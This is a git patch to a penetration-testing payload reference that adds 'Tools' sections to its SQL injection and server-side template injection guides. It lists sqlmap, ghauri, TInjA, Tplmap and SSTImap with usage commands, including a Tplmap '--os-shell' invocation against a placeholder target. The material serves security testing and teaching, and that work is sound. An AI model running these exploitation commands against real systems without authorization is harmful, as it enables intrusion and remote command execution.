From 97cfeee270395a838802fa1fcb8a4d5ffc6d6b48 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 21 Jan 2024 21:39:23 +0100 Subject: [PATCH] Tools Update --- SQL Injection/README.md | 6 +++ Server Side Template Injection/README.md | 48 ++++++++++-------------- 2 files changed, 25 insertions(+), 29 deletions(-) diff --git a/SQL Injection/README.md b/SQL Injection/README.md index b682947..3705869 100644 --- a/SQL Injection/README.md +++ b/SQL Injection/README.md @@ -46,6 +46,12 @@ Attempting to manipulate SQL queries may have goals including: * [Case modification](#case-modification) +## Tools + +* [sqlmapproject/sqlmap](https://github.com/sqlmapproject/sqlmap) - Automatic SQL injection and database takeover tool +* [r0oth3x49/ghauri](https://github.com/r0oth3x49/ghauri) - An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws + + ## Entry point detection Detection of an SQL injection entry point diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index a3c6acb..084237e 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -82,44 +82,34 @@ - [PHP - Plates](#plates) - [References](#references) + ## Tools -Recommended tools: +* [TInjA](https://github.com/Hackmanit/TInjA) - An effiecient SSTI + CSTI scanner which utilizes novel polyglots + ```bash + tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..." + tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..." + ``` -[TInjA](https://github.com/Hackmanit/TInjA) - An effiecient SSTI + CSTI scanner which utilizes novel polyglots +* [Tplmap](https://github.com/epinna/tplmap) - Server-Side Template Injection and Code Injection Detection and Exploitation Tool + ```powershell + python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell + python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link" + python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade + ``` -e.g: - -```bash -tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..." -tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..." -``` - -[Tplmap](https://github.com/epinna/tplmap) - Server-Side Template Injection and Code Injection Detection and Exploitation Tool - -e.g: - -```powershell -python2.7 ./tplmap.py -u 'http://www.target.com/page?name=John*' --os-shell -python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=*&comment=supercomment&link" -python2.7 ./tplmap.py -u "http://192.168.56.101:3000/ti?user=InjectHere*&comment=A&link" --level 5 -e jade -``` - -[SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [Tplmap](https://github.com/epinna/tplmap) - -e.g: - -```powershell -python3 ./sstimap.py -u 'https://example.com/page?name=John' -s -python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade -python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk' -``` +* [SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [Tplmap](https://github.com/epinna/tplmap) + ```powershell + python3 ./sstimap.py -u 'https://example.com/page?name=John' -s + python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade + python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk' + ``` ## Methodology ![SSTI cheatsheet workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/serverside.png?raw=true) ---- + ## Detection In most cases, this polyglot payload will trigger an error in presence of a SSTI vulnerability :